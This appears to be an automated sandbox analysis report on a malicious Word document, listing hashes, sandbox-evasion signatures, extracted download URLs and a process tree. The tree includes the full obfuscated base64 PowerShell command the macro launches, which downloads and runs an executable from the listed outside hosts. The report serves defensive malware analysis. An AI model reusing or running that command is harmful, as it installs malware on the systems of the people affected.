Analysis
-
max time kernel
142s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
04/05/2024, 10:00
Behavioral task
behavioral1
Sample
1236ff8f54d16a65d4b8769e898751dc_JaffaCakes118.doc
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
1236ff8f54d16a65d4b8769e898751dc_JaffaCakes118.doc
Resource
win10v2004-20240226-en
General
-
Target
1236ff8f54d16a65d4b8769e898751dc_JaffaCakes118.doc
-
Size
101KB
-
MD5
1236ff8f54d16a65d4b8769e898751dc
-
SHA1
dcda29c090dc9a43ad1af20f7b053939a27c3047
-
SHA256
c4f0377f14559f123dccc3336687fceeb532ddd392be2d1fe16a7867513c8af9
-
SHA512
8d003d2a79e601b4c68a5e99eb6083b9005c2c3904e62709c4a20b5adc64af9f12cd96d6859707639618f48bc1e3da7754ae12b8841307ce4c9e3afb1039df36
-
SSDEEP
1536:dTQ79GRoUes+i+ag/UBzJVigaGKb6Ee3sN:dKGNeLJmYgKWEe3sN
Malware Config
Extracted
http://pentox.hu/wwLj/
http://imagesbr.com/W1m4JL4/
http://ralf-kern.de/trpevrc/
http://nutrisea.net/UH0J0p/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1216 4964 PowersHeLL.exe 88 -
Blocklisted process makes network request 4 IoCs
flow pid Process 25 1216 PowersHeLL.exe 32 1216 PowersHeLL.exe 37 1216 PowersHeLL.exe 42 1216 PowersHeLL.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1216 PowersHeLL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4964 WINWORD.EXE 4964 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1216 PowersHeLL.exe 1216 PowersHeLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1216 PowersHeLL.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 4964 WINWORD.EXE 4964 WINWORD.EXE 4964 WINWORD.EXE 4964 WINWORD.EXE 4964 WINWORD.EXE 4964 WINWORD.EXE 4964 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4964 wrote to memory of 1216 4964 WINWORD.EXE 93 PID 4964 wrote to memory of 1216 4964 WINWORD.EXE 93
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1236ff8f54d16a65d4b8769e898751dc_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Windows\System32\WindowsPowerShell\v1.0\PowersHeLL.exePowersHeLL -WinDowsTyle hidden -e IAAmACgAIAAoAFsAcwBUAHIASQBOAGcAXQAkAFYARQBSAEIATwBzAGUAUAByAEUARgBlAFIAZQBOAEMARQApAFsAMQAsADMAXQArACcAWAAnAC0AagBPAEkAbgAnACcAKQAgACgAKAAoACcANgBmAFcAbgBzAGEAZABhACcAKwAnAHMAZAAgAD0AIAAmACcAKwAnACgAJwArACcATgAnACsAJwBwAG0AbgBOACcAKwAnAHAAJwArACcAbQAnACsAJwArAE4AJwArACcAcABtAGUATgBwAG0AKwBOAHAAJwArACcAbQB3AC0AbwBiAGoAJwArACcAZQBjACcAKwAnAE4AcABtACsATgBwAG0AdAAnACsAJwBOACcAKwAnAHAAJwArACcAbQAnACsAJwApACcAKwAnACAAcgBhAG4AZAAnACsAJwBvAG0AOwA2AGYAVwBZACcAKwAnAFkAVQAgAD0AIAAuACgATgBwAG0AbgBlAE4AJwArACcAcABtACcAKwAnACsATgBwAG0AdwBOAHAAbQArAE4AJwArACcAcABtAC0AJwArACcAbwBiACcAKwAnAGoAZQAnACsAJwBjACcAKwAnAHQATgBwAG0AKQAgAFMAeQBzAHQAZQBtAC4ATgBlAHQAJwArACcALgBXACcAKwAnAGUAJwArACcAYgAnACsAJwBDAGwAaQAnACsAJwBlAG4AdAA7ADYAJwArACcAZgBXAE4AUwBCACAAJwArACcAPQAgADYAZgAnACsAJwBXAG4AcwAnACsAJwBhAGQAYQAnACsAJwBzACcAKwAnAGQAJwArACcALgBuAGUAeAB0ACcAKwAnACgAMQAnACsAJwAwADAAMAAnACsAJwAwACwAIAAnACsAJwAyACcAKwAnADgAJwArACcAMgAxADMAMwAnACsAJwApADsANgBmAFcAQQBEAEMAWAAgAD0AIAAnACsAJwBOACcAKwAnAHAAbQANACcAKwAnAAoAaAB0AHQAcAA6AC8ALwBmAGEAYwBpAHUAcwBhAC4AYwBvAG0ALwBMAEkAYwAnACsAJwBDAGsALwBAAGgAdAB0AHAAOgAvAC8AcABlAG4AdABvACcAKwAnAHgALgAnACsAJwBoAHUALwB3AHcAJwArACcATABqAC8AJwArACcAQABoAHQAdABwADoALwAvAGkAbQAnACsAJwBhAGcAJwArACcAZQBzACcAKwAnAGIAcgAuAGMAbwAnACsAJwBtAC8AVwAxACcAKwAnAG0AJwArACcANAAnACsAJwBKAEwANAAnACsAJwAvACcAKwAnAEAAJwArACcAaAAnACsAJwB0AHQAJwArACcAcAA6AC8ALwByAGEAbABmAC0AJwArACcAawBlAHIAJwArACcAbgAnACsAJwAuACcAKwAnAGQAZQAvAHQAcgBwACcAKwAnAGUAdgByAGMAJwArACcALwBAAGgAJwArACcAdAAnACsAJwB0ACcAKwAnAHAAOgAnACsAJwAvAC8AbgB1ACcAKwAnAHQAcgAnACsAJwBpAHMAZQBhAC4AbgAnACsAJwBlAHQALwAnACsAJwBVACcAKwAnAEgAJwArACcAMABKACcAKwAnADAAcAAvAE4AcABtAC4AUwAnACsAJwBwAGwAaQB0ACgATgBwAG0AJwArACcAQABOAHAAbQApADsANgBmAFcAUwBEAEMAJwArACcAIAA9ACAANgAnACsAJwBmAFcAJwArACcAZQBuACcAKwAnAHYAJwArACcAOgBwACcAKwAnAHUAYgBsAGkAYwAnACsAJwAgACcAKwAnACsAIABOACcAKwAnAHAAbQBsADUAJwArACcASwBOAHAAbQAgACsAIAAnACsAJwA2AGYAVwBOAFMAQgAgACsAIAAoACcAKwAnAE4AcABtAC4AZQB4ACcAKwAnAE4AcAAnACsAJwBtACsATgBwACcAKwAnAG0AZQAnACsAJwBOAHAAbQApADsAZgBvAHIAZQBhAGMAaAAoADYAZgBXACcAKwAnAGEAJwArACcAcwBmAGMAIAAnACsAJwBpACcAKwAnAG4AIAA2AGYAJwArACcAVwBBAEQAQwAnACsAJwBYACkAJwArACcAewB0ACcAKwAnAHIAeQB7ADYAJwArACcAZgBXAFkAWQBVACcAKwAnAC4AcQAnACsAJwBXADEARABvAEsAagAnACsAJwAyAFcAbgBsAEsAagAyAE8AYQBkAEYASQBLACcAKwAnAGoAMgBsAGUAcQBXACcAKwAnADEAKAAnACsAJwA2AGYAVwBhACcAKwAnAHMAJwArACcAZgAnACsAJwBjACcAKwAnAC4AcQBXADEAVABvAFMAdAByACcAKwAnAEsAJwArACcAagAnACsAJwAyAGkASwBqADIAJwArACcATgAnACsAJwBnAHEAVwAxACgAKQAnACsAJwAsACcAKwAnACAANgAnACsAJwBmAFcAJwArACcAUwBEAEMAKQAnACsAJwA7ACcAKwAnACYAKAAnACsAJwBOAHAAbQBJACcAKwAnAG4AJwArACcAdgBvAE4AcABtACsAJwArACcATgBwAG0AJwArACcAawBOAHAAbQArAE4AcAAnACsAJwBtAGUALQBJACcAKwAnAHQAJwArACcAZQBtAE4AcABtACcAKwAnACkAKAA2AGYAVwBTACcAKwAnAEQAJwArACcAQwApACcAKwAnADsAYgByACcAKwAnAGUAJwArACcAYQBrACcAKwAnADsAfQBjAGEAdABjAGgAewB9ACcAKwAnAH0AJwApACAALQBSAEUAUABsAGEAQwBFACAAIAAnAEsAagAyACcALABbAEMASABhAFIAXQA5ADYAIAAtAFIARQBQAGwAYQBDAEUAKABbAEMASABhAFIAXQAxADAAOAArAFsAQwBIAGEAUgBdADUAMwArAFsAQwBIAGEAUgBdADcANQApACwAWwBDAEgAYQBSAF0AOQAyACAALQBjAHIAZQBwAEwAQQBDAGUAKABbAEMASABhAFIAXQAxADEAMwArAFsAQwBIAGEAUgBdADgANwArAFsAQwBIAGEAUgBdADQAOQApACwAWwBDAEgAYQBSAF0AMwA0ACAALQBjAHIAZQBwAEwAQQBDAGUAIAAoAFsAQwBIAGEAUgBdADUANAArAFsAQwBIAGEAUgBdADEAMAAyACsAWwBDAEgAYQBSAF0AOAA3ACkALABbAEMASABhAFIAXQAzADYAIAAtAFIARQBQAGwAYQBDAEUAJwBOAHAAbQAnACwAWwBDAEgAYQBSAF0AMwA5ACkAKQA=2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4460 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:81⤵PID:1652
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
177B
MD589dce080903d2f556569cfad15c7b3be
SHA1abfba475afafa174f316a8fc1e9f0d612d3e6e1e
SHA256b3c154cd1d142396f0b6e5b006cdf677c7d7268b49711ce0567f65dc248e304f
SHA51221f3da3606e2b49b5c98109f8dcbea2e43a560223dfc02376ad3b613a945d87342a1ef54e75ab7b8ac03cd74e9e73ea87921176d10b99b4ad03ae86bafdb490e
-
Filesize
4KB
MD5ca45329f00252d30fbfa78fc960ae88e
SHA159d578b157788b36fe5aa521ba5ffbcb19db551e
SHA2566b0528d8567a9ea0b6359c137e95fcb97379c69e4a9547dc1dca29a8f0ecafd5
SHA5121cb1f20721f8cc0eefec83ae50aa1833dd4a0f45d8119170c149e1b9125f033a55dcaebc42f8994d940b3fa3ffc22c94849054b3836c7bb2f7ea328c85fc7e74
-
Filesize
789B
MD5977bc2baa9913be10209f20c5854cf83
SHA1597eeeb0c1b611e9fec64b363e0c367394e874a5
SHA256a6441fb6db7e6668c3fbe90b492c8d5ad298a644959ee198bddab24acd0329e5
SHA51253283b94b59fd1395b0693fc396058b78958747f35f5736f439569d021c87cda9a50179b064ce7cb7adeadcbd20ee8e56b00d7c4ca02de49dbb0842a0c7ec2d7